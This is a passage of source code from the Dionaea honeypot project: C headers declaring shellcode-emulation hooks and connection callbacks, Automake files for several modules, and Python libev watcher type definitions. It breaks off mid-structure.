22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | struct connection; 29 | struct processor_data; 30 | struct emu; 31 | struct emu_env; 32 | struct lcfgx_tree_node; 33 | 34 | struct emu_ctx 35 | { 36 | struct emu_config *config; 37 | int offset; 38 | }; 39 | 40 | struct emu_config 41 | { 42 | struct 43 | { 44 | int files; 45 | int filesize; 46 | int sockets; 47 | double sustain; 48 | double idle; 49 | double listen; 50 | int steps; 51 | double cpu; 52 | }limits; 53 | }; 54 | 55 | void *proc_emu_ctx_new(void *cfg); 56 | void proc_emu_ctx_free(void *ctx); 57 | void *proc_emu_ctx_cfg_new(struct lcfgx_tree_node *node); 58 | void proc_emu_on_io_in(struct connection *con, struct processor_data *pd); 59 | void proc_emu_on_io_out(struct connection *con, struct processor_data *pd); 60 | 61 | int run(struct emu *e, struct emu_env *env); 62 | void profile(struct emu_config *conf, struct connection *con, void *data, unsigned int size, unsigned int offset); 63 | 64 | 65 | 66 | void emulate_thread(gpointer data, gpointer user_data); 67 | void emulate(struct emu_config *conf, struct connection *con, void *data, unsigned int size, unsigned int offset); 68 | 69 | /* hooks.c */ 70 | struct emu_env; 71 | struct emu_env_hook; 72 | 73 | enum emu_state 74 | { 75 | running, waiting, failed 76 | }; 77 | 78 | struct emu_emulate_ctx 79 | { 80 | struct emu_config *config; 81 | 82 | struct connection *ctxcon; 83 | 84 | GMutex *mutex; 85 | struct emu *emu; 86 | struct emu_env *env; 87 | 88 | /** 89 | * mapping 'virtual' fd to struct connection * 90 | */ 91 | GHashTable *sockets; 92 | /** 93 | * mapping struct connection * to int32_t processhandle 94 | */ 95 | GHashTable *processes; 96 | GHashTable *files; 97 | unsigned long steps; 98 | uint32_t esp; 99 | enum emu_state state; 100 | GTimer *time; 101 | 102 | int serial; 103 | }; 104 | 105 | struct emu_file 106 | { 107 | FILE *fh; 108 | char 
*path; 109 | }; 110 | 111 | void user_hook_accept_cb(EV_P_ struct ev_io *w, int revents); 112 | uint32_t user_hook_accept(struct emu_env *env, struct emu_env_hook *hook, ...); 113 | uint32_t user_hook_bind(struct emu_env *env, struct emu_env_hook *hook, ...); 114 | void user_hook_connect_cb(EV_P_ struct ev_io *w, int revents); 115 | uint32_t user_hook_connect(struct emu_env *env, struct emu_env_hook *hook, ...); 116 | uint32_t user_hook_close(struct emu_env *env, struct emu_env_hook *hook, ...); 117 | uint32_t user_hook_listen(struct emu_env *env, struct emu_env_hook *hook, ...); 118 | uint32_t user_hook_recv(struct emu_env *env, struct emu_env_hook *hook, ...); 119 | uint32_t user_hook_send(struct emu_env *env, struct emu_env_hook *hook, ...); 120 | uint32_t user_hook_socket(struct emu_env *env, struct emu_env_hook *hook, ...); 121 | uint32_t user_hook_WSASocket(struct emu_env *env, struct emu_env_hook *hook, ...); 122 | uint32_t user_hook_CreateProcess(struct emu_env *env, struct emu_env_hook *hook, ...); 123 | void user_hook_WaitForSingleObject_cb(EV_P_ struct ev_child *w, int revents); 124 | uint32_t user_hook_WaitForSingleObject(struct emu_env *env, struct emu_env_hook *hook, ...); 125 | 126 | 127 | uint32_t user_hook_CreateFile(struct emu_env *env, struct emu_env_hook *hook, ...); 128 | uint32_t user_hook_WriteFile(struct emu_env *env, struct emu_env_hook *hook, ...); 129 | uint32_t user_hook_CloseHandle(struct emu_env *env, struct emu_env_hook *hook, ...); 130 | 131 | int32_t ll_win_hook_recv(struct emu_env *env, struct emu_env_hook *hook); 132 | int32_t ll_win_hook_accept(struct emu_env *env, struct emu_env_hook *hook); 133 | 134 | 135 | uint32_t user_hook__lcreat(struct emu_env *env, struct emu_env_hook *hook, ...); 136 | uint32_t user_hook__lwrite(struct emu_env *env, struct emu_env_hook *hook, ...); 137 | uint32_t user_hook__lclose(struct emu_env *env, struct emu_env_hook *hook, ...); 138 | 139 | extern struct processor proc_emu; 140 | 
-------------------------------------------------------------------------------- /modules/nc/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | 7 | AM_CFLAGS += 8 | AM_LDFLAGS = 9 | 10 | 11 | pkglib_LTLIBRARIES = nc.la 12 | 13 | nc_la_SOURCES = nc.c nc.h 14 | 15 | nc_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | -------------------------------------------------------------------------------- /modules/nc/nc.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | 31 | struct connection; 32 | 33 | void proto_nc_established(struct connection *con); 34 | void proto_nc_established_source(struct connection *con); 35 | bool proto_nc_error(struct connection *con, enum connection_error error); 36 | uint32_t proto_nc_io_in(struct connection *con, void *context, unsigned char *data, uint32_t size); 37 | uint32_t proto_nc_io_in_redir(struct connection *con, void *context, unsigned char *data, uint32_t size); 38 | bool proto_nc_disconnect(struct connection *con, void *context); 39 | bool proto_nc_timeout(struct connection *con, void *context); 40 | void *proto_nc_ctx_new(struct connection *con); 41 | void proto_nc_ctx_free(void *ctx); 42 | 43 | void proto_nc_established_http(struct connection *con); 44 | uint32_t proto_nc_io_in_http(struct connection *con, void *context, unsigned char *data, uint32_t size); 45 | void *proto_nc_ctx_new_http(struct connection *con); 46 | void proto_nc_ctx_free_http(void *ctx); 47 | 48 | extern struct protocol proto_nc_http; 49 | extern struct protocol proto_nc_source; 50 | extern struct protocol proto_nc_sink; 51 | extern struct protocol proto_nc_redir; 52 | 53 | -------------------------------------------------------------------------------- /modules/nfq/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.am 2538 2009-01-25 22:35:27Z common $ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src -pipe -D _GNU_SOURCE -fno-strict-aliasing 6 | AM_CFLAGS += -Wall -Werror 7 | 8 | AM_CFLAGS += ${LIB_LCFG_CFLAGS} ${LIB_GLIB_CFLAGS} 9 | AM_LDFLAGS = ${LIB_LCFG_LIBS} ${LIB_GLIB_LIBS} 10 | 11 | 12 | pkglib_LTLIBRARIES = nfq.la 13 | 14 | nfq_la_SOURCES = nfq.c nfq.h 15 | 16 | nfq_la_LDFLAGS = -module -no-undefined -avoid-version 
-lnetfilter_queue 17 | -------------------------------------------------------------------------------- /modules/nl/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += ${CFLAGS_DEFAULT} ${CFLAGS_DEBUG} 7 | 8 | #AM_CFLAGS += -g -I/opt/dionaea/include/netlink/ 9 | AM_CFLAGS += $(LIB_NL_CFLAGS) 10 | #AM_LDFLAGS = -Wl,-rpath,/opt/dionaea/lib -L/opt/dionaea/lib -lnl -lnl-route -lnl-genl -lnl-nf 11 | AM_LDFLAGS = $(LIB_NL_LIBS) 12 | 13 | 14 | pkglib_LTLIBRARIES = nl.la 15 | 16 | nl_la_SOURCES = module.c 17 | 18 | nl_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 19 | -------------------------------------------------------------------------------- /modules/pcap/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_PCAP_CFLAGS) 9 | AM_LDFLAGS = $(LIB_PCAP_LIBS) 10 | 11 | pkglib_LTLIBRARIES = pcap.la 12 | 13 | pcap_la_SOURCES = pcap.c 14 | 15 | pcap_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | 17 | -------------------------------------------------------------------------------- /modules/python/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | SUBDIRS = scripts util 6 | 7 | all: binding.c 8 | 9 | binding.c: setup.py setup.py.in binding.pyx module.c module.h ../../config.h ../../include/protocol.h ../../include/dionaea.h 10 | $(PYTHON) setup.py build 11 | 12 | install-exec-am: all 13 | cp build/*/dionaea/*.so $(DESTDIR)$(pkglibdir)/python.so 14 | rm -rf $(DESTDIR)$(pkglibdir)/python/dionaea/core.so 15 | ln -s $(DESTDIR)$(pkglibdir)/python.so 
$(DESTDIR)$(pkglibdir)/python/dionaea/core.so 16 | rm -rf $(DESTDIR)$(pkglibdir)/python/dionaea/pyev.so 17 | ln -s $(DESTDIR)$(pkglibdir)/python.so $(DESTDIR)$(pkglibdir)/python/dionaea/pyev.so 18 | 19 | clean: 20 | $(PYTHON) setup.py clean 21 | rm -rf ./build binding.{c,h} 22 | 23 | dist-clean: clean 24 | 25 | 26 | EXTRA_DIST = setup.py module.c module.h binding.pyx 27 | 28 | -------------------------------------------------------------------------------- /modules/python/module.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include "connection.h" 30 | 31 | #define PY_CLONE(T) (T)->ob_type->tp_new((T)->ob_type, __pyx_empty_tuple, NULL) 32 | #define PY_NEW(T) (((PyTypeObject*)(T))->tp_new( (PyTypeObject*)(T), __pyx_empty_tuple, NULL)) 33 | #define PY_INIT(P, O) (P)->ob_type->tp_init((O), __pyx_empty_tuple, NULL) 34 | #define REFCOUNT(T) printf("obj refcount %i\n", (int)(T)->ob_refcnt) 35 | 36 | #define REMOTE(C) (C)->remote 37 | #define LOCAL(C) (C)->local 38 | 39 | struct connection; 40 | 41 | unsigned int python_handle_io_in_cb(struct connection *con, void *context, unsigned char *data, uint32_t size); 42 | 43 | void log_wrap(char *name, int number, char *file, int line, char *msg); 44 | void traceback(void); 45 | PyObject *pygetifaddrs(PyObject *self, PyObject *args); 46 | PyObject *pylcfg(PyObject *self, PyObject *args); 47 | PyObject *pyversion(PyObject *self, PyObject *args); 48 | 49 | 50 | struct ihandler; 51 | struct incident; 52 | void set_ihandler(struct ihandler *ih); 53 | void traceable_ihandler_cb(struct incident *i, void *ctx); 54 | 55 | 56 | struct protocol; 57 | void set_protocol(struct protocol *p); 58 | void *traceable_ctx_new_cb(struct connection *con); 59 | void traceable_ctx_free_cb(void *ctx); 60 | void traceable_origin_cb(struct connection *origin, struct connection *con); 61 | void traceable_established_cb(struct connection *con); 62 | uint32_t traceable_io_in_cb(struct connection *con, void *context, unsigned char *data, uint32_t size); 63 | void traceable_io_out_cb(struct connection *con, void *context); 64 | bool traceable_error_cb(struct connection *con, enum connection_error error); 65 | bool traceable_disconnect_cb(struct connection *con, void *context); 66 | bool traceable_idle_timeout_cb(struct connection *con, void *context); 67 | bool traceable_listen_timeout_cb(struct connection *con, 
void *context); 68 | bool traceable_sustain_timeout_cb(struct connection *con, void *context); 69 | 70 | struct processor; 71 | void set_processor(struct processor *); 72 | void python_processor_bistream_create(struct connection *con); 73 | 74 | -------------------------------------------------------------------------------- /modules/python/pyev/Async.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * AsyncType 3 | *******************************************************************************/ 4 | 5 | /* AsyncType.tp_doc */ 6 | PyDoc_STRVAR(Async_tp_doc, 7 | "Async(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* AsyncType.tp_new */ 11 | static PyObject * 12 | Async_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Async *self = (Async *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->async, EV_ASYNC); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* Async.send() */ 24 | PyDoc_STRVAR(Async_send_doc, 25 | "send()"); 26 | 27 | static PyObject * 28 | Async_send(Async *self) 29 | { 30 | ev_async_send(((Watcher *)self)->loop->loop, &self->async); 31 | Py_RETURN_NONE; 32 | } 33 | 34 | 35 | /* AsyncType.tp_methods */ 36 | static PyMethodDef Async_tp_methods[] = { 37 | {"send", (PyCFunction)Async_send, 38 | METH_NOARGS, Async_send_doc}, 39 | {NULL} /* Sentinel */ 40 | }; 41 | 42 | 43 | /* Async.sent */ 44 | PyDoc_STRVAR(Async_sent_doc, 45 | "sent"); 46 | 47 | static PyObject * 48 | Async_sent_get(Async *self, void *closure) 49 | { 50 | PYEV_RETURN_BOOL(ev_async_pending(&self->async)); 51 | } 52 | 53 | 54 | /* AsyncType.tp_getsets */ 55 | static PyGetSetDef Async_tp_getsets[] = { 56 | {"sent", (getter)Async_sent_get, NULL, 57 | Async_sent_doc, NULL}, 58 | {NULL} /* Sentinel */ 59 | }; 60 | 61 | 62 | /* AsyncType */ 63 | 
static PyTypeObject AsyncType = { 64 | PyVarObject_HEAD_INIT(NULL, 0) 65 | "pyev.Async", /*tp_name*/ 66 | sizeof(Async), /*tp_basicsize*/ 67 | 0, /*tp_itemsize*/ 68 | 0, /*tp_dealloc*/ 69 | 0, /*tp_print*/ 70 | 0, /*tp_getattr*/ 71 | 0, /*tp_setattr*/ 72 | 0, /*tp_compare*/ 73 | 0, /*tp_repr*/ 74 | 0, /*tp_as_number*/ 75 | 0, /*tp_as_sequence*/ 76 | 0, /*tp_as_mapping*/ 77 | 0, /*tp_hash */ 78 | 0, /*tp_call*/ 79 | 0, /*tp_str*/ 80 | 0, /*tp_getattro*/ 81 | 0, /*tp_setattro*/ 82 | 0, /*tp_as_buffer*/ 83 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 84 | Async_tp_doc, /*tp_doc*/ 85 | 0, /*tp_traverse*/ 86 | 0, /*tp_clear*/ 87 | 0, /*tp_richcompare*/ 88 | 0, /*tp_weaklistoffset*/ 89 | 0, /*tp_iter*/ 90 | 0, /*tp_iternext*/ 91 | Async_tp_methods, /*tp_methods*/ 92 | 0, /*tp_members*/ 93 | Async_tp_getsets, /*tp_getsets*/ 94 | 0, /*tp_base*/ 95 | 0, /*tp_dict*/ 96 | 0, /*tp_descr_get*/ 97 | 0, /*tp_descr_set*/ 98 | 0, /*tp_dictoffset*/ 99 | 0, /*tp_init*/ 100 | 0, /*tp_alloc*/ 101 | Async_tp_new, /*tp_new*/ 102 | }; 103 | -------------------------------------------------------------------------------- /modules/python/pyev/Check.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * CheckType 3 | *******************************************************************************/ 4 | 5 | /* CheckType.tp_doc */ 6 | PyDoc_STRVAR(Check_tp_doc, 7 | "Check(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* CheckType.tp_new */ 11 | static PyObject * 12 | Check_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Check *self = (Check *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->check, EV_CHECK); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* CheckType */ 24 | static PyTypeObject CheckType = { 25 | 
PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Check", /*tp_name*/ 27 | sizeof(Check), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Check_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Check_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/Child.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * utilities 3 | *******************************************************************************/ 4 | 5 | /* set the Child */ 6 | void 7 | set_Child(Child *self, int pid, PyObject *trace) 8 | { 9 | ev_child_set(&self->child, pid, (trace == Py_True) ? 
1 : 0); 10 | } 11 | 12 | 13 | /******************************************************************************* 14 | * ChildType 15 | *******************************************************************************/ 16 | 17 | /* ChildType.tp_doc */ 18 | PyDoc_STRVAR(Child_tp_doc, 19 | "Child(pid, trace, loop, callback[, data=None, priority=0])"); 20 | 21 | 22 | /* ChildType.tp_new */ 23 | static PyObject * 24 | Child_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 25 | { 26 | Child *self = (Child *)WatcherType.tp_new(type, args, kwargs); 27 | if (!self) { 28 | return NULL; 29 | } 30 | new_Watcher((Watcher *)self, (ev_watcher *)&self->child, EV_CHILD); 31 | return (PyObject *)self; 32 | } 33 | 34 | 35 | /* ChildType.tp_init */ 36 | static int 37 | Child_tp_init(Child *self, PyObject *args, PyObject *kwargs) 38 | { 39 | int pid; 40 | PyObject *trace; 41 | Loop *loop; 42 | PyObject *callback, *data = NULL; 43 | int priority = 0; 44 | 45 | static char *kwlist[] = {"pid", "trace", 46 | "loop", "callback", "data", "priority", NULL}; 47 | 48 | if (!PyArg_ParseTupleAndKeywords(args, kwargs, "iO!O!O|Oi:__init__", kwlist, 49 | &pid, &PyBool_Type, &trace, 50 | &LoopType, &loop, &callback, &data, &priority)) { 51 | return -1; 52 | } 53 | if (!ev_is_default_loop(loop->loop)) { 54 | PyErr_SetString(Error, "loop must be the 'default loop'"); 55 | return -1; 56 | } 57 | if (init_Watcher((Watcher *)self, loop, callback, 1, data, priority)) { 58 | return -1; 59 | } 60 | set_Child(self, pid, trace); 61 | return 0; 62 | } 63 | 64 | 65 | /* Child.set(pid, trace) */ 66 | PyDoc_STRVAR(Child_set_doc, 67 | "set(pid, trace)"); 68 | 69 | static PyObject * 70 | Child_set(Child *self, PyObject *args) 71 | { 72 | int pid; 73 | PyObject *trace; 74 | 75 | PYEV_SET_ACTIVE_WATCHER(self); 76 | if (!PyArg_ParseTuple(args, "iO!:set", &pid, &PyBool_Type, &trace)) { 77 | return NULL; 78 | } 79 | set_Child(self, pid, trace); 80 | Py_RETURN_NONE; 81 | } 82 | 83 | 84 | /* ChildType.tp_methods */ 
85 | static PyMethodDef Child_tp_methods[] = { 86 | {"set", (PyCFunction)Child_set, 87 | METH_VARARGS, Child_set_doc}, 88 | {NULL} /* Sentinel */ 89 | }; 90 | 91 | 92 | /* Child.pid */ 93 | PyDoc_STRVAR(Child_pid_doc, 94 | "pid"); 95 | 96 | 97 | /* Child.rpid */ 98 | PyDoc_STRVAR(Child_rpid_doc, 99 | "rpid"); 100 | 101 | 102 | /* Child.rstatus */ 103 | PyDoc_STRVAR(Child_rstatus_doc, 104 | "rstatus"); 105 | 106 | 107 | /* ChildType.tp_members */ 108 | static PyMemberDef Child_tp_members[] = { 109 | {"pid", T_INT, offsetof(Child, child.pid), 110 | READONLY, Child_pid_doc}, 111 | {"rpid", T_INT, offsetof(Child, child.rpid), 112 | 0, Child_rpid_doc}, 113 | {"rstatus", T_INT, offsetof(Child, child.rstatus), 114 | 0, Child_rstatus_doc}, 115 | {NULL} /* Sentinel */ 116 | }; 117 | 118 | 119 | /* ChildType */ 120 | static PyTypeObject ChildType = { 121 | PyVarObject_HEAD_INIT(NULL, 0) 122 | "pyev.Child", /*tp_name*/ 123 | sizeof(Child), /*tp_basicsize*/ 124 | 0, /*tp_itemsize*/ 125 | 0, /*tp_dealloc*/ 126 | 0, /*tp_print*/ 127 | 0, /*tp_getattr*/ 128 | 0, /*tp_setattr*/ 129 | 0, /*tp_compare*/ 130 | 0, /*tp_repr*/ 131 | 0, /*tp_as_number*/ 132 | 0, /*tp_as_sequence*/ 133 | 0, /*tp_as_mapping*/ 134 | 0, /*tp_hash */ 135 | 0, /*tp_call*/ 136 | 0, /*tp_str*/ 137 | 0, /*tp_getattro*/ 138 | 0, /*tp_setattro*/ 139 | 0, /*tp_as_buffer*/ 140 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 141 | Child_tp_doc, /*tp_doc*/ 142 | 0, /*tp_traverse*/ 143 | 0, /*tp_clear*/ 144 | 0, /*tp_richcompare*/ 145 | 0, /*tp_weaklistoffset*/ 146 | 0, /*tp_iter*/ 147 | 0, /*tp_iternext*/ 148 | Child_tp_methods, /*tp_methods*/ 149 | Child_tp_members, /*tp_members*/ 150 | 0, /*tp_getsets*/ 151 | 0, /*tp_base*/ 152 | 0, /*tp_dict*/ 153 | 0, /*tp_descr_get*/ 154 | 0, /*tp_descr_set*/ 155 | 0, /*tp_dictoffset*/ 156 | (initproc)Child_tp_init, /*tp_init*/ 157 | 0, /*tp_alloc*/ 158 | Child_tp_new, /*tp_new*/ 159 | }; 160 | 
-------------------------------------------------------------------------------- /modules/python/pyev/Fork.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * ForkType 3 | *******************************************************************************/ 4 | 5 | /* ForkType.tp_doc */ 6 | PyDoc_STRVAR(Fork_tp_doc, 7 | "Fork(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* ForkType.tp_new */ 11 | static PyObject * 12 | Fork_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Fork *self = (Fork *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->fork, EV_FORK); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* ForkType */ 24 | static PyTypeObject ForkType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Fork", /*tp_name*/ 27 | sizeof(Fork), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Fork_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Fork_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/Idle.c: 
-------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * IdleType 3 | *******************************************************************************/ 4 | 5 | /* IdleType.tp_doc */ 6 | PyDoc_STRVAR(Idle_tp_doc, 7 | "Idle(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* IdleType.tp_new */ 11 | static PyObject * 12 | Idle_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Idle *self = (Idle *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->idle, EV_IDLE); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* IdleType */ 24 | static PyTypeObject IdleType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Idle", /*tp_name*/ 27 | sizeof(Idle), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Idle_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Idle_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/PeriodicBase.c: -------------------------------------------------------------------------------- 1 | 
/******************************************************************************* 2 | * PeriodicBaseType 3 | *******************************************************************************/ 4 | 5 | /* PeriodicBaseType.tp_new */ 6 | static PyObject * 7 | PeriodicBase_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 8 | { 9 | PeriodicBase *self = (PeriodicBase *)WatcherType.tp_new(type, args, kwargs); 10 | if (!self) { 11 | return NULL; 12 | } 13 | new_Watcher((Watcher *)self, (ev_watcher *)&self->periodic, EV_PERIODIC); 14 | return (PyObject *)self; 15 | } 16 | 17 | 18 | /* PeriodicBase.reset() */ 19 | PyDoc_STRVAR(PeriodicBase_reset_doc, 20 | "reset()"); 21 | 22 | static PyObject * 23 | PeriodicBase_reset(PeriodicBase *self) 24 | { 25 | ev_periodic_again(((Watcher *)self)->loop->loop, &self->periodic); 26 | Py_RETURN_NONE; 27 | } 28 | 29 | 30 | /* PeriodicBase.at() -> float */ 31 | PyDoc_STRVAR(PeriodicBase_at_doc, 32 | "at() -> float"); 33 | 34 | static PyObject * 35 | PeriodicBase_at(PeriodicBase *self) 36 | { 37 | return PyFloat_FromDouble(ev_periodic_at(&self->periodic)); 38 | } 39 | 40 | 41 | /* PeriodicBaseType.tp_methods */ 42 | static PyMethodDef PeriodicBase_tp_methods[] = { 43 | {"reset", (PyCFunction)PeriodicBase_reset, 44 | METH_NOARGS, PeriodicBase_reset_doc}, 45 | {"at", (PyCFunction)PeriodicBase_at, 46 | METH_NOARGS, PeriodicBase_at_doc}, 47 | {NULL} /* Sentinel */ 48 | }; 49 | 50 | 51 | /* PeriodicBaseType */ 52 | static PyTypeObject PeriodicBaseType = { 53 | PyVarObject_HEAD_INIT(NULL, 0) 54 | "pyev.PeriodicBase", /*tp_name*/ 55 | sizeof(PeriodicBase), /*tp_basicsize*/ 